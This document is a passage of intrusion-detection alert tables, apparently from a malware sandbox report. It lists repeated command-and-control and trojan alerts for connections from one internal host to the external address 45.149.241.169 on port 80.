2024-10-03T09:21:15.899147+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64368 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:16.915649+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64369 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:17.866524+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64370 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:19.008215+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64371 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:21.428539+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64372 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:22.234810+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64373 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:23.090242+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64374 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:23.948484+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64375 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:24.875611+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64376 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:25.669335+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64378 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:26.688958+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64379 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:27.634586+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64380 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:28.548334+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64381 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:29.432337+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64382 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:30.259881+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64383 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:31.213756+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64384 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:32.591622+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64385 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:33.386243+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64386 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:35.070962+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64387 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:46.491936+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64388 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:47.323870+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64389 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:48.281112+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64390 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:49.089316+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64391 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:50.342573+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64392 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:51.138044+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64393 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:51.987281+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64394 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:52.824432+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64395 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:53.813148+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64396 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:54.779943+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64397 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:55.743930+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64398 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:57.049613+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64399 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:58.009483+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64400 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:58.968924+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64401 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:59.912717+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64402 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:00.875995+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64403 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:02.986735+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64404 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:03.927136+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64405 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:04.921954+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64406 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:06.114484+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64407 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:07.060441+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64408 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:07.996431+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64409 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:09.068231+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64410 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:10.004080+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64411 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:11.079290+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64412 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:12.003792+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64413 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:12.893575+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64414 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:13.853371+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64415 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:14.776328+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64416 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:15.764134+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64417 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:16.667875+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64418 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:17.525911+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64419 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:18.555021+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64420 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:19.379297+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64421 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:20.358626+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64422 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:21.203422+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64423 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:22.048862+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64424 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:22.910892+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64425 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:23.931318+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64426 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:24.748653+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64427 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:25.639024+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64428 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:26.473248+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64429 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:27.331889+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64430 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:28.156424+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64431 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:29.195837+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64432 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:30.480234+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64433 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:31.486447+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64434 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:32.303507+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64435 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:33.188157+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64436 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:34.292855+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64437 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:35.079411+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64438 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:35.848697+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64439 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:36.750157+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64440 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:37.777548+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64441 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:38.687921+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64442 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:39.523859+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64443 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:40.350489+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64444 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:41.352352+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64445 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:42.187830+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64446 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:43.088359+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64447 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:43.911035+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64448 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:44.840138+0200 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64449 | 45.149.241.169 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-03T09:20:48.138102+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 49711 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:49.427132+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 49712 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:50.395968+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 49713 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:52.138116+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 49714 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:53.059614+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 49715 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:55.313220+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 49717 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:56.544536+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 49718 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:58.316168+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 55843 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:59.272737+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64348 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:00.670903+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64350 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:01.623467+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64352 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:02.448704+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64354 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:03.488048+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64355 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:04.428362+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64357 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:05.363793+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64358 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:06.386274+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64359 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:07.265208+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64360 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:08.224949+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64361 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:09.172629+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64362 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:09.997521+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64363 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:10.996788+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64364 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:12.112321+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64365 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:13.055508+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64366 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:13.916854+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64367 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:14.881238+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64368 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:16.059969+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64369 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:17.083633+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64370 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:18.023488+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64371 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:19.175709+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64372 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:21.592824+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64373 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:22.386915+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64374 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:23.246842+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64375 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:24.104473+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64376 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:25.029228+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64378 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:25.820375+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64379 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:26.851586+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64380 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:27.810227+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64381 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:28.697925+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64382 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:29.591807+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64383 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:30.413511+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64384 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:31.498785+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64385 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:32.743030+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64386 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:33.556187+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64387 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:35.239657+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64388 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:46.647501+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64389 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:47.487101+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64390 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:48.440836+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64391 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:49.258711+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64392 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:50.499694+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64393 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:51.287566+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64394 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:52.148748+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64395 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:52.981934+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64396 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:54.007169+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64397 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:54.945256+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64398 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:55.920209+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64399 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:57.220850+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64400 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:58.171912+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64401 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:59.151255+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64402 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:00.075267+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64403 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:01.051486+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64404 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:03.157629+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64405 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:04.115545+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64406 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:05.338912+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64407 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:06.283716+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64408 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:07.225458+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64409 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:08.313595+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64410 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:09.230403+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64411 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:10.331436+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64412 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:11.239806+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64413 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:12.172123+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64414 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:13.068985+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64415 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:14.008975+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64416 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:14.936067+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64417 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:15.929179+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64418 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:16.827330+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64419 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:17.703674+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64420 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:18.714301+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64421 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:19.547744+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64422 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:20.566222+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64423 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:21.356699+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64424 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:22.220181+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64425 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:23.369318+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64426 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:24.106031+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64427 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:24.910667+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64428 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:25.816016+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64429 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:26.659850+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64430 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:27.504132+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64431 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:28.311778+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64432 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:29.639445+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64433 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:30.646052+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64434 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:31.674682+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64435 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:32.502916+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64436 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:33.340490+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64437 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:34.448158+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64438 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:35.225001+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64439 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:36.015476+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64440 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:36.917140+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64441 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:37.931400+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64442 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:38.836712+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64443 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:39.681925+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64444 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:40.614660+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64445 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:41.558183+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64446 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:42.344416+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64447 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:43.251789+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64448 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:44.067474+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.11 | 64449 | 45.149.241.169 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-03T09:20:48.138102+0200 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49711 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:49.427132+0200 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49712 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:50.395968+0200 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49713 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:52.138116+0200 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49714 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:53.059614+0200 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49715 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:55.313220+0200 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49717 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:56.544536+0200 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49718 | 45.149.241.169 | 80 | TCP |
